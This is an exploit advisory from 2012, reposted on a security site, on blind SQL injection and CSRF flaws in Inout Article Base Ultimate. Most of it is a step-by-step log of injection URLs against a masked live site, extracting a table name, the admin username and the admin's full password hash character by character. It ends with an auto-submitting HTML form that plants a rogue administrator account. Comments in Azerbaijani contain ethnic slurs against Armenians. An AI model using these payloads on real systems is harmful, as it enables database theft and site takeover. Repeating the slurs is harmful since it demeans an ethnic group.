Inout Article Base Ultimate 2 Blind SQLi & CSRF

2012-10-24 / 2012-10-25
Credit: AkaStep
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

============ Vulnerable Software: Inout Article Base Ultimate Version: < 2 Vulnerabilities: Blind SQLi && CROSS Site Request Forgery. Discovered and Exploited in Wild Vendor: inoutscripts.com ============ About software version: ============ I can't say what exact version affected but:(it is probably version < 2.0)) Here is what it's Upgrade.html says: *Inout ArticleBase-Upgradtion to version 2.0* If you are currently using old version of Inout ArticleBase and want to upgrade to version 2.0 of Inout ArticleBase, please follow the instructions given below. etc... ============ =========================VULNERABLE CODE======================================= //controller/ViewController.class.php function getarticlecount($cid) { $cat= $this->getSubcategoryList($cid); $this->loadLibrary("settings"); $set=new settings("nesote_inoutarticle_settings"); $set->loadValues(); $show_articles=$set->getValue("show_ articles_selected_language"); $lang_id=$this->getlang_id(); if($show_articles==1) $languagecondition="and lang_id='".$lang_id."'"; else $languagecondition=""; //echo $parent; $db= new NesoteDALController(); if($cat!=null) { $len=strlen($cat); $cat=substr($cat,0,($len-2)); } else $cat="'".$cid."'"; $total=$db->total(array("c"=>"nesote_inoutarticle_categories","a"=>"nesote_inoutarticle_articles"),"a.cid=c.id and a.cid in($cat) and a.status=? and c.status=? $languagecondition",array(1,1)); // echo $db->getQuery(); return $total; } ================================EXPLOITATION=================================== On TRUE returns: normal page to articles. On FALSE returns: No article posted yet. //TRUE verir bu. www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)='1',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8 http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(length(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='i',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8 http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='e',benchmark(10000000,md5(1)),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if('a'='ab',1,0))-- and 8=('8 TRUE DA xeberlerli sehife false-de No article posted yet. AND logical ile. password adli column burda olmalidir: //TRUE http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 1-CI SIMVOL c 2-ci simvol: l http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,2,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 3-de: a www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,3,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 4-de s http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,4,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 5-de: s http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,5,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 6-da i http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,6,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 7-de f http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,7,1)='f',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 8-de i http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,8,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 9-da e http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,9,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 10-da d http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,10,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 11-de s http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,11,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 12-de _ http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,12,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 hal hazirda classifieds_ 13-de: n http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,13,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 classifieds_n http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(table_name)='46',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 46 simvol! Burda deyiblere anovu sikim ermeni!!!!!!!!!!! Sikdirdi bu table baxaq basqasina. ====================================================== 24-e qeder cixmir http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(table_name)!='0',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 25)-- and 8=('8 14-cu simvol: e 15-ci simvol: s http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,15,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 16-ci simvol: o http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,16,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 17-ci simvol: t http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,17,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 18-ci simvol: e http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,18,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 davamini gedek gorek ne verir. 19-da _ olmalidir yoxlayaq yene de. duzdur 19-cu simvol: _ http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,19,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 20-ci simvol: i http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,20,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 21-ci simvol: n http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,21,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 22-ci simvol: o http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,22,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 23-cu simvol: u http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,23,1)='u',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 24-cu simvol: t http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,24,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 25-ci simvol: a http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,25,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 26-ci simvol: r http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,26,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 27-ci simvol: t http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,27,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 28-ci simvol: i http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,28,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 29-cu simvol: c http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,29,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 30-cu simvol: l http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,30,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 31-ci simvol: e http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,31,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 32-ci simvol: _ http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,32,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 33-cu simvol: a http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,33,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 34-cu simvol: d http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,34,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 deyesen adminlikdir burda duz cixiriq ustune artiq. 35-ci simvol: m http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,35,1)='m',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 36-ci simvol: i http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,36,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 37-ci simvol: n http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,37,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 38-ci simvol: i http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,38,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 39-cu simvol: s http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,39,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 40-ci simvol: t http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,40,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 41-ci simvol: r http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,41,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 42-ci simvol: a http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,42,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 43-cu simvol: t http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,43,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 44-cu simvol: o http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,44,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 45-ci simvol: r http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,45,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 46-ci simvol: s http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 Bu axirinci simvol idi cunki TRUE qaytardi yoxlanis: http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,100)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 table_name-i yigaq. mysql> select length('classifieds_nesote_inoutarticle_administrators') \g ---------------------------------------------------------- | length('classifieds_nesote_inoutarticle_administrators') | ---------------------------------------------------------- | 46 | ---------------------------------------------------------- 1 row in set (0.00 sec) mysql> //TRUE http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,100)='classifieds_nesote_inoutarticle_administrators',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8 burda bizde username id password columnlari var. Oxay bavan qurban 1 username var burda 100% adminlikdir))))))) http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(username)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC)-- and 8=('8 //TRUE http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(username,1,10)='admin',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 menasiz idi amma yene de 100 olcek bir bicek //TRUE http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(username)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 MD5-dir pass: http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(password)='32',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 Cekek getsin naxuy: ======================================================== qancigin parolunun md5-i nin 1ci simvolu: 1-ci simvol: f //TRUE http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,1,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 2-ci simvol: 8 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,2,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 3-cu simvol: c http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,3,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 4-cu simvol: b http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,4,1)='b',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 5-ci simvol: e http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,5,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 6-ci simvol: 6 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,6,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 7-ci simvol: 3 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,7,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 8-ci simvol: 7 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,8,1)='7',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 9-cu simvol: 1 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,9,1)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 10-cu simvol: 6 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,10,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 11-ci simvol: 4 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,11,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 12-ci simvol: 2 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,12,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 13-cu simvol: 5 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,13,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 14-cu simvol: 4 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,14,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 15-ci simvol: 4 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,15,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 16-ci simvol: 6 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,16,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 17-ci simvol: 2 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,17,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 18-ci simvol: 9 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,18,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 19-ci simvol: 5 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,19,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 20-ci simvol: 2 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,20,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 21-ci simvol: f http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,21,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 22-ci simvol: d http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,22,1)='d',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 23-cu simvol: a http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,23,1)='a',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 24-cu simvol: 4 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,24,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 25-ci simvol: c http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,25,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 26-ci simvol: e http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,26,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 27-ci simvol: 2 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,27,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 28-ci simvol: 3 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,28,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 29-cu simvol: 9 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,29,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 30-cu simvol: 8 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,30,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 31-ci simvol: e http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,31,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== 32-ci simvol: 0 http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,32,1)='0',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8 ======================================================== CSRF add admin: username: blackhatz password: blackhatz email: blackhatz@blackhatz.tld <body onload="javascript:document.forms[0].submit()"> <form name="addsubadmin" id="addsubadmin" enctype="multipart/form-data" method="POST" action="http://www.xxxxxxxxxxxx.tld/admin/permissions/addsubadminprocess"> <input name="username" type="text" id="username" value="blackhatz"> <input name="name" type="text" id="name" value="blackhatz"> <input name="password" type="password" id="password" value="blackhatz"> <input name="cpassword" type="password" id="cpassword" value="blackhatz"> <input name="email" type="text" id="email" value="blackhatz@blackhatz.tld"> <select name="gid" id="gid" > <option value="1"></option> <option value="1">admins selected="selected"</option> </select> <input name="pid" type="hidden" id="pid" value="{$pid}"> <!-- <input type="submit" name="Submit" value="Submit">--> </form> ================ THE END ===================== ================================================ SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS: ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com exploit-db.com osvdb.com websecurity.com.ua to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep

References:

http://inoutscripts.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top